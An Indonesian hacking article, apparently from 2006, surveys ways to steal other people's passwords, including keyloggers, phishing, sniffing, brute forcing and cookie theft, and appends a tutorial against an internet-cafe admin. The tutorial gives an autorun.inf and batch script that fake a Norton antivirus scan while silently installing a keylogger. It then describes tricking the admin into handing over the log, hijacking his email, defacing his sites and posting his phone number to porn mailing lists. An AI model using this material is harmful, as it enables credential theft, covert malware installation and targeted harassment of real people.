: Table oF Contents :
- [0XFF00000] Preface
- [0XFFF0000] Bagaimana Mendapatkannya?
- Social Engineering
- KeyLogger
- Web Spoofing
- Menghadang Email
- Password Cracking
- Session Hijacking
- Menjadi Proxy Server
- Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
- Googling
- [0XFFFF000] Penutup
- [0XFFFFF00] Referensi
- [0XFFFFFFF] Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]
0 [0XFF00000] Preface
Pencurian password, pengambilalihan
account, merupakan hal yang sering terjadi di dunia cyber. Bukan hal
yang sulit untuk melakukannya, namun banyak para newbie yang terus saja
bertanya-tanya.. “Bagaimana cara mendapatkan password email orang lain?”
atau pertanyaan yang paling sering saya terima ialah..
“Bagaimana cara anda mendapatkan password saya?”
Untuk pertanyaan-pertanyaan itulah
artikel ini ditulis, semoga bisa menambah wawasan anda dan membuka
pikiran anda tentang betapa pentingnya menjaga account saat berada di
tempat-tempat rawan.
0 [0XFFF0000] Bagaimana Mendapatkannya?
Ada banyak cara untuk mendapatkan suatu
password. Beberapa diantaranya tidak membutuhkan keahlian khusus.
Berikut adalah cara-cara yang paling umum dan paling sering digunakan:
- Social Engineering
- KeyLogger
- Web Spoofing
- Menghadang Email
- Password Cracking
- Session Hijacking
- Menjadi Proxy Server
- Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
- Googling
[1]. Social Engineering
Social Engineering adalah nama suatu
teknik pengumpulan informasi dengan memanfaatkan celah psikologi korban.
Atau mungkin boleh juga dikatakan sebagai “penipuan”
Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang
korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran
seperti sang korban.
Social Engineering merupakan seni
“memaksa” orang lain untuk melakukan sesuatu sesuai dengan harapan atau
keinginan anda. Tentu saja “pemaksaan” yang dilakukan tidak secara
terang-terangan atau diluar tingkah laku normal yang biasa dilakukan
sang korban.
Manusia cenderung untuk percaya atau
mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau
sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau
penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social
engineering untuk menjerat korbannya. Seringkali sang pelaku membuat
suatu kondisi agar kita memiliki semacam ketergantungan
kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu
masalah dan membuat (seolah – olah hanya) dialah yang bisa mengatasi
masalah itu. Dengan demikian, tentu kita akan cenderung untuk menuruti
apa yang dia instruksikan tanpa merasa curiga.
Sosial Engineering adakalanya menjadi
ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi,
namun sosial engineering tetap layak diwaspadai karena bisa berakibat
fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer
tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem
komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia.
ehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker
melalui social engineering, maka bisa jadi anda sendirilah yang
membukakan jalan masuk bagi sang attacker.
#Contoh Social Engineering sederhana:
Baca Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]
[2]. KeyLogger
KeyLogger adalah software yang dapat
merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks
atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user.
Aplikasi ini mampu mengenali form-form sensitif seperti form password
misalnya.
Ada cara aman untuk menghindari keyloger:
- Gunakan password dengan karakter special seperti !@#$%^&*(){}[].
Kebanyakan keyloger akan mengabaikan karakter ini sehingga sang pelaku
(pemasang keyloger) tidak akan mendapatkan password anda yang
sebenarnya.
- Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin
memasukkan password, tingal copy-paste ajah. Keyloger akan membaca
password anda berdasarkan ketukan keyboard. Namun cara ini agak
beresiko. Mengapa? karena saat anda melakukan copy, data anda akan
tersimpan di clipboard. Saat ini banyak dijumpai software-software
gratis yang bisa menampilkan data dalam clipboard.
[3]. Web Spoofing
Masih ingat kasus pecurian Account
sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web
spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user
saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web
Spoofing adalah usaha untuk menipu korban agar mengira dia sedang
mengakses suatu situs tertentu, padahal bukan.
Pada kasus bank BCA, pelaku membuat
situs yang sangat mirip dan identik dengan situs aslinya sehingga sang
korban yang terkecoh tidak akan merasa ragu mengisikan informasi
sensitif seperti user name dan Passwordnya. Padahal, karena situs
tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam
oleh webserver palsu, yaitu milik sang pelaku.
[4]. Menghadang Email
Menghadang email? Ya, dan sangat mudah
untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan
mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah
dengan menghadang paket data yang lewat di Internet dan menyusunnya
menjadi suatu email utuh.
Dsniff dan mailsnift merupakan software
bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu
library yang menangkap paket-paket data. Paket-paket yang ditangkap ini
akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan
MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data
ini dan menampilkan password (dsniff) atau isi email (mailsnarf).
Baca artikel terkait pada arsip lama
[5]. Password Cracking
“Hacking while sleeping.” itulah
ungkapan yang biasa dipakai oleh orang-orang yang melakukan password
cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk
melakukan pasword cracking. Bisa berjam-jam, bahkan berhari – hari!
Semua itu tergantung dari target, apakah sang target menggunakan
password yang umum, password memiliki panjang karakter yang tidak biasa,
atau password memiliki kombinasi dengan karakter-karakter special.
Salah satu software yang biasa digunakan
untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu
jenis software remote password cracker yang cukup terkenal. Brutus
bekerja dengan teknik dictionary attack atau bruce-force attack terhadap
port-port http, POP3,ftp, telnet, dan NetBIOS.
Dictionary Attack bekerja dengan
mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute –
force attack bekerja dengan mencobakan semua kombinasi huruf, angka,
atau karakter.
Brute Force Atack bekerja sangat lambat
dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi
komputernya dan panjang karakter passwordnya. Saat ini telah banyak
situs yang menutup akses terhadap akses terhadap usaha login yang secara
terus-menerus tidak berhasil.
Jika anda ingin melakukan password Cracking, silahkan pilih – pilih sendiri aplikasinya di halaman Member – spyrozone.net.
[6]. Session Hjacking
Session hijacking dewasa ini semakin
marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan
melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru
cookies sang korban untuk mendapatkan sesi loginnya.
Lalu bagaimana cara mendapatkan cookies
sang korban? 1. Dengan analisa Cookies. Cara ini relatif sulit
dilakukan. 2. Mencuri Cokies. Misalnya Sang Attacker ingin mendapatkan
account si A. Sang Attacker bisa dengan mudah membuat semacam script
Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat
korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam
ke suatu webserver dengan memanfaatkan suatu script PHP.
Belakangan ini yang paling sering
menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu
scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri
untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki
tips untuk ini:
- Jangan menggunakan browser InternetExplorer saat ingin membuka
profil orang lain. Catat alamat profil yang ingi anda lihat,logout
terlebih dahulu dari account anda dan bersihkan semua cookies, baru
kemudian bukalah profil Friendster tujuan.
- Ketika menerima testimonial, periksa terlebih dahulu source codenya.
Apakah disana terdapat script asing atau kata-kata yang identik dengan
pembajakan seperti : “HACKED”, “DEFACED”, “OWNED”.. dll.. Jika
ragu-ragu……. reject ajah..
- Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout
dengan sendirinya dari account anda. Saat anda diminta memasukkan
username dan password, lihat dulu addressbar anda! apakan anda sedang
berada di situs yang semestinya atau tidak. Periksa source code halaman
tersebut.Lihat pada form action, kemana informasi anda nantinya akan
dikirim.
Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:
- Menetapkan session identifier yang unik
- Menetapkan sistem identifier berpola acak
- Session identifier yang independen
- Session identifier yang bisa dipetakan dengan koneksi client side.
Fenomena lain adalah,hingga saat artikel
ini diterbitkan,ternyata masih banyak dijumpai para user yang tidak
melakukan sign out setelah membuka accountnya. Dengan demikian, orang
lain yang mengunakan komputer itu dan membuka website yang sama dengan
yang telah dibuka oleh orang pertama akan otomatis login ke account sang
korban.
[7]. Menjadi Proxy Server
Kita bisa mengumpulkan informasi dengan
menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi
proxy server, seluruh identitas sang peselancar bisa menjadi milik
kita.
[8]. Memanfaatkan Kelalaian user dalam penggunaan fitur browser
Setiap browser tentunya memiliki fitur
yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam
berselancar. Diantaranya ialah dengan adanya cache dan Password Manager.
Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.net nich.. hehehe
Nah, untuk situs yang seperti ini cache menjadi hal yang sangat
berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya
jika anda berkunjung lagi ke situs tersebut browser tidakperlu lagi
melakukan download untuk kedua kalinya dari server sehingga setiap
halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih
cepat. Semua itu biasanya diatur oleh header time to live.
Lho, bagaimana dengan situs-situs
penyedia berita yang selalu up to date? Untuk site yang seperti itu,
time to live-nya akan di set=0 sehinga nantinya anda akan terus
melakukan download setiap kali berkunjung.
Cukup nyaman bukan? Ya, tapi ancaman
mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan
cache pada browser anda. Tentu anda bisa menemui bahwa ada fasilitas
untuk menentukan berapa besarnya file temporary yang bisa disimpan di
harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan.
Coba anda buka folder tersebut, anda
akan menemui file-file html & file-file gambar dari site-site yang
sudah anda kunjungi. Pada Browser IE, anda bisa melihat lokasi file
cache dengan menjelajahi menu Tools —> Internet options —>
Settings
Lalu apa yang bisa didapatkan?? toh cuma
file-file “sampah”?? Hmm… sekarang coba anda copy semua file yang ada
di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu
komputer publik,anda bisa mengetahui situs apa saja yang telah diakses
oleh oleh orang sebelum anda.
Hmm.. hanya dengan melihat file
temporary anda bahkan bisa melihat password dan dll.Banyak saya temui
situs yang menyimpan password dan menampilkannya pada url. Tentunya anda
juga pasti sering membacanya di berbagai tutorial.
Kebanyakan browser pada saat ini
memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan
Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang
menanyakan apakah anda ingin password anda disimpan atau tidak oleh
PasswordManager.Kebanyakan user cenderung untuk memilih opsi YES, entah
itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak
mau tau) apa maksud dari kotak dialog itu.
Orang lain yang kemudian mengunakan
browser itu bisa dengan sangat mudah mendapatkan password korban dengan
memasuki menu Tools —> Options —> Security –> Saved password.
Contoh lain adalah fasilitas wand
password yang dimiliki oleh browser Opera. Saat anda memasukkan user
name dan password pada suatu form dan menekan tombol submit, opera
secara default akan meminta konfirmasi kepada anda apakah anda ingin
browser menyimpan id dan password anda atau tidak. Lagi dan lagi…
kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi “YES”.
Lalu?? Orang lain yang kemudian
menggunakan browser itu bisa melihat situs apa saja yang telah diakses
oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form
isian user name, tekan [ALT]+[ENTER] dan BOOOMM!!!! Kenapa?? Jangan
kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name
korban lengkap dengan passwordnya ;D It’s fun enough..
Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!
[9]. Googling
Google.com. Banyak sudah situs yang
runtuh, password dan nomor – nomor kartu kredit yang dicuri akibat dari
ulah orang yang menyalahgunaan kesaktiannya
Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci
tertentu yang berkaitan dengan user name dan password, anda bisa memanen
ratusan password user melalui google. Tapi sekarang tampaknya anda
harus gigit jari jika menggunakan cara diatas ;D
Jangan sedih dulu karena Google baru
saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru
mulai timbul, “si pintar” ini kini dapat meng-crawl hingga kepada
archive file yang berada di public directory web server. Hati-hati yang
punya kebiasaan untuk menyimpan informasi penting di dalamnya (password,
dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu
dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda
bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang
memanfaatkan produk baru google ini untuk mengeruk informasi sensitif
dari web server anda. dan jika itu sudah terjadi… maka bersiaplah..
“taman bermain” anda akan diambil alih olehnya..
0 [0XFFFF000] Penutup
Wew… ada banyak cara bukan untuk
mendapatkan account orang lain?? So, selalu berhati-hatilah. Waspada
selalu saat berada di tempat umum, bahkan saat berada di komputer
pribadi anda sekalipun karena bisa jadi teman anda atau siapapun yang
meminjam komputer anda memiliki tujuan yang kurang baik.
Sekian, semoga bermanfaat dan bisa menambah pengetahuan anda
0 [0XFFFFF00] Referensi
- securityfocus[dot]com
- phrack[dot]org
- spyrozone[dot]net
- google[dot]com
0 [0XFFFFFFF] Attachment:
Berikut adalah contoh social engineering
sederhana. Saya ambil dari tulisan saya yang berjudul “Pembalasan Untuk
Sang Admin”-www.spyrozone.net. Enjoy…
——————————————————————
Pembalasan Untuk Sang Admin – SOcial Engineering
May 12, 2006 jam 21:16 malam di depan RedHat tercinta dengan segelas Heineken
Author: SPYRO KiD
CopyLeft (c) 2006 by www.spyrozone.net
|—[Table of Contents
- Introduction
- Serangan pertama
- Serangan kedua
- Hari pembalasan
- Cara pencegahan
- Penutup
1. Introduction
Semakin paranoidnya para admin
belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe
(warnet) menjadi kurang nyaman. Restriction (pembatasan) disana-sini
(walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah satu
inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala
keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis
exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk
para newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai tak jarang lupa diri
Namun semua itu tentunya tidak bertahan lama. Admin menjadi semakn
pintar. Fasilitas Floppy drive dan CD room drive dihapus dan melarang
user untuk melakukan segala bentuk transfer file dari media penyimpanan
sementara (disket, cd, flashdisk) kecuali melalui server terlebih
dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui
dengan mudah di berbagai Internet cafe. Admin mulai rajin mengupdate
path sehingga exploit-exploit yang dulu dibangga-banggakan oleh kaum
newbie menjadi "rongsokan" tak berguna.
Sekarang, mari kita bangunkan sang admin
dari mimpi indahnya untuk menunjukkan bahwa menjadi paranoid itu
adakalanya tidak baik dan tidak ada system yang 100% secure.
2. Serangan pertama
Kita akan menjadi seorang "agen
mata-mata" (hehehe.. gw pake istilah ini biar ente merasa agak sedikit
keren) yang akan merekam segala aktivitas sang admin. Tujuannya..
banyak! dan salah satunya seperti hal yang banyak diinginkan orang...
mendapatkan password sang admin. Partner kita kali ini adalah
navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu
dapatkan suka-suka dengan harga cuma-cuma di halaman member
www.spyrozone.net kategori Keyloger. Setelah kamu download keyloger
tersebut, ikuti langkah - langkah berikut:
---[1 Bukalah Notepad kemudian ketik baris script berikut:
[autorun] open=nav.bat
Klik [file][save] kemudian pada box save
as type, pilih All Files dan pada form isian name beri nama Autorun.inf
lalu klik tombol [save].
—[2 Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik script berikut:
@echo off echo Norton Antivirus 2006
echo Scanning disk drive… echo Please wait… copy navw32.exe
%windir%\navw32.exe call %windir%\navw32.exe echo. echo. echo. echo.
echo. echo. echo. echo. Scanning complette! No virus threat detected!
echo. cls
Klik [file][save] kemudian pada box save
as type, pilih All Files dan pada form isian name beri nama nav.bat
lalu klik tombol [save].
—[3. Persiapkan beberapa file microsoft
word documents (bisa diganti dengan file lain) sebagai tipuan/alasan
untuk di transfer. Semakin banyak file, semakin baik karena file
keyloger kamu akan semakin tersamarkan.
—[4. Persiapkan sebuah cd kosong (bekas
juga boleh) lalu bakar semua file diatas (autorun.inf, nav.bat,
navw32.exe dan file-file tipuan) kedalam CD.
Sekarang pergilah ke warnet tempat sang
admin berkuasa. Bersikaplah seperti biasa dan jangan gugup selayaknya
para koruptor yang sering nampang di satasion-stasion TI-PI tanpa rasa
malu. Setelah kamu login ke billing komputer user, datangi sang admin.
Katakan pada beliau, “Mas/mbak/om/tante/, mau transfer file dari cd ini.
Nama filenya blablabla tolong dikirim ke komputer nomor blablabla.”
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf
secara otomatis —> file autorun.inf akan memproses file nav.bat
—> file nav.bat akan menduplikasi file navw32.exe ke dalam directory
windows dan mengaktifkannya —> Keyloger telah terinstall, hasil
rekamannya akan tersimpan di directory yang sama dengan nama navw32.dll
beratribut hidden.
Perlu diketahui bahwa keyloger ini tidak
akan menampilkan kotak dialog dalam bentuk apapun! So, nggak usah
khawatir bakal ketahuan
Sekarang, kamu bisa pulang dengan wajah
tanpa dosa dan mungkin (lagi – lagi) kamu bakalan senyum-senyum sendiri
sambil mengelus-elus jenggot kayak habis menang togel.
Lalu bagaimana cara mengambil file hasil
rekaman keyloger di directory windows sang admin? Ikuti langkah-langkah
pada serangan kedua.
3. Serangan kedua
Dua hari Kemudian, datanglah ke warnet
itu lagi. Bertingkahlakulah secara wajar dan beraktivitas seperti
layaknya user biasa. Setelah selesai berinternet ria, datangi sang
admin, bayarlah biaya browsing seperti biasa lalu dengan wajah
sangat-sangat memelas seperti pengemis di jalanan
katakan pada beliau,”Mas/mbak/om/tante/, komputer saya bermasalah
neeh. Menurut pesan Error yang muncul, file navw32.dll yang berada di
directory windows hilang. File tersebut beratribut hidden. Tolong doong
copykan dari komputer ini. Kebetulan versi windowsnya sama dengan
komputer saya..”
Tentu saja biasanya sang admin dengan
sangat senang hati akan membantu kamu. Dengan suka rela dan penuh
kesadaran beliau akan mengaktifkan opsi Show All files pada Folder
Options dan mengcopy-kan file navw32.dll dari directory windows tanpa
menyadari bahwa file tersebut bukan file system, namun file hasil
rekaman keyloger.
Berikan disket/cd/flashdisk mu dan
setelah file tersebut tersimpan, ucapkan beribu terima kasih lalu
pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x pada file lalu
ketika muncul kotak dialog open with, klik opsi select program from a
list dan pilih notepad pada daftar program yang ditampilkan. Sekarang
tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.
4. Hari Pembalasan
Pilih hari yang tepat, misalnya malam
jum’at kliwon dimana sang admin mungkin sedang terlelap di rumahnya.
Nyalakan komputermu dan connectlah ke Internet. Namun ada baiknya kamu
lakukan hal ini di warnet agar lebih aman. Carilah warnet yang buka 24
jam.
Berbekal hasil rekaman keyloger tadi,
loginlah ke account email sang admin. Setelah puas menjelajahi emailnya,
subscriblah ke berbagai mailing list besar dengan email tersebut.
Subscribe sebanyak-banyaknya.
Hohoho.. lalu apa lagi nich?? Kalau sang
admin punya blog/website pribadi/ account Friendster.. tentu kamu
dengan mudah mendapatkan semua password itu dengan fasilitas forgot
password. Kebanyakan penyedia layanan seperti itu akan mengirimkan
password via email. So, setelah dapat semuanya… heheh… DEFACE ajah
Tapi inget lho, halaman lama harus tetap di backup dan jangan merubah password apapun!!
Ada ide yang sedikit lebih sadis (ini
cuma ide lho.. sebaiknya jangan dilakukan deech..). Daftarkan emailnya
ke berbagai situs – situs porno dan postinglah sebuah pesan singkat,
memikat dan “mematikan”. Berikut contohnya jika milis tersebut berbahasa
Indonesia:
Dear all.. gwe lagi nafsu berat neeh,
burun telepon gwe doong sekarang juga!! neeh no telp gwe: 021-blablabla
(masukkan no telp sang admin) gwe tunggu 24 jam lho!!
Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata- kata yang yahuud!! ;D
Maka bisa dipastikan malam itu akan
menjadi malam jumat kliwon paling mengerikan bagi sang admin, lebih
mengerikan daripada film-film horor manapun! Telepon rumahnya akan
berdering tanpa henti dibanjiri oleh telepon dari dalam dan luar negeri
dengan maksud pembicaraan yang sudah bisa ditebak apa maksudnya ;D
Keesokan harinya, setelah menghadapi
malam paling mengerikan itu, sang admin akan kaget 1/2 hidup 1/2 mati
mendapati inboxnya penuh dengan email-email dari berbagai milis yang
beliau sendiri tidak merasa pernah bergabung dengan milis-milis itu. Dan
bisa jadi, saat beliau sedang sibuk Unsubcribe dari milis-milis
tersebut, telepon rumahnya masih terus – terusan menjerit – jerit dengan
jeritan indah
5. Pencegahan
Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka setiap kamu menerima CD dari siapapun..
- Buka windows explorer
- Tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive.
- Setelah CD masuk,tetap tekan tombol shift sampai kira-kira 25 detik.
Setelah itu kamu bisa melepas tombol shift dan mengaksesnya melalui
panel sebelah kiri windows Explorer. Klik pada area folder tree, jangan
pada daftar drive sebelah kanan karena fitur autorun akan aktif.
Dan ingat, jangan terlalu percaya pada siapapun! Ada begitu banyak orang tidak terduga di sekitar anda!!
6. Penutup
—[+ Kesimpulan
Bisa kita bayangkan sendiri betapa
kelalaian sepele bisa menimbulkan dampak yang sangat berbahaya. Ini
hanya merupakan contoh Social Engineering sederhana namun dampaknya..
bisa anda bayangkan sendiri
Cara diatas sudah saya coba pada 4 buah
warnet di sidoarjo dan hasilnya saya berhasil mendapatkan catatan
aktivitas sang admin (password etc..). Tapi untuk penerapan “PEMBALASAN”
tentu saya tidak melakukan hal sekejam itu ;P